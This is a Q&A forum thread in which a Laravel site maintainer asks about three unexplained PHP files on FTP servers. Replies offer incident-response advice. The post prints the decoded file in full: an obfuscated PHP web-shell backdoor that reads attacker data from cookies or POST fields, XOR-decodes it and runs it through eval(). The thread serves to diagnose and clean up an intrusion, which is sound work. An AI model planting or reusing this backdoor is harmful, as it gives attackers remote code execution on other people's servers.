# Suspiciously looking files suddenly appeared on FTP server

Tags: php, laravel, ftp

For a customer I am maintaining a small group of websites built in PHP Laravel. Lately while working on these I have discovered a couple of new suspicious looking files, which suddenly appeared on two of the websites FTP servers. The files are not originally a part of the codebase, and I have no idea where they're coming from all of a sudden. There are three files in total, named `b3lo5x3x.php`, `cache.php` and `plugin.php` and they are located in the root directory of the websites.

The content of the files looks pretty disturbing. When decoded on [unphp.net](http://www.unphp.net) I get the following result, which is the exact same for all three files. The size of all three files are also the same.

```
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
    function dgubnv($fvgiv, $lfpfzw, $nclll) {
        return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
    }
    function oocfo($fvgiv, $elasr) {
        return @$fvgiv[9]($fvgiv[1], $elasr);
    }
    function yiugt($fvgiv, $elasr) {
        $vezpr = $fvgiv[3]($elasr) % 3;
        if (!$vezpr) {
            eval($elasr[1]($elasr[2]));
            exit();
        }
    }
    $wqudv = oocfo($fvgiv, $wqudv);
    yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
```

Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?

Comment: your suspicions are correct. your machine has been compromised. I almost guarantee that code boils down to letting someone send arbitrary code through $_POST and then runs eval() on it. check your access logs to see how much that file has been accessed.

Comment: @castis Thank you for your fast response. So if I am to check the access logs, I should not delete the files yet?

Comment: if those files are publicly accessible with a browser then I would definitely move them out of public view immediately.

Comment: And change all the passwords of your servers!

Comment: There's a slim chance there's a vulnerability in your FTP server software - if your host allows SFTP you can just ditch the FTP server completely. Otherwise see if you can restrict access by IP or if your host provides a way for you to toggle FTP access on/off when required.

Comment: Thank you guys for all your advice. I will take this to the company who hosts the websites and get it sorted out.

Answer (score 1):

Wipe the machines affected completely. You need to reinstall the Laravel project(s) to a new clean machine. You also should audit them and any other software used if possible.

Make sure that all of the software on the server is updated too. Most likely you were compromised through a non updated software with a known vulnerability.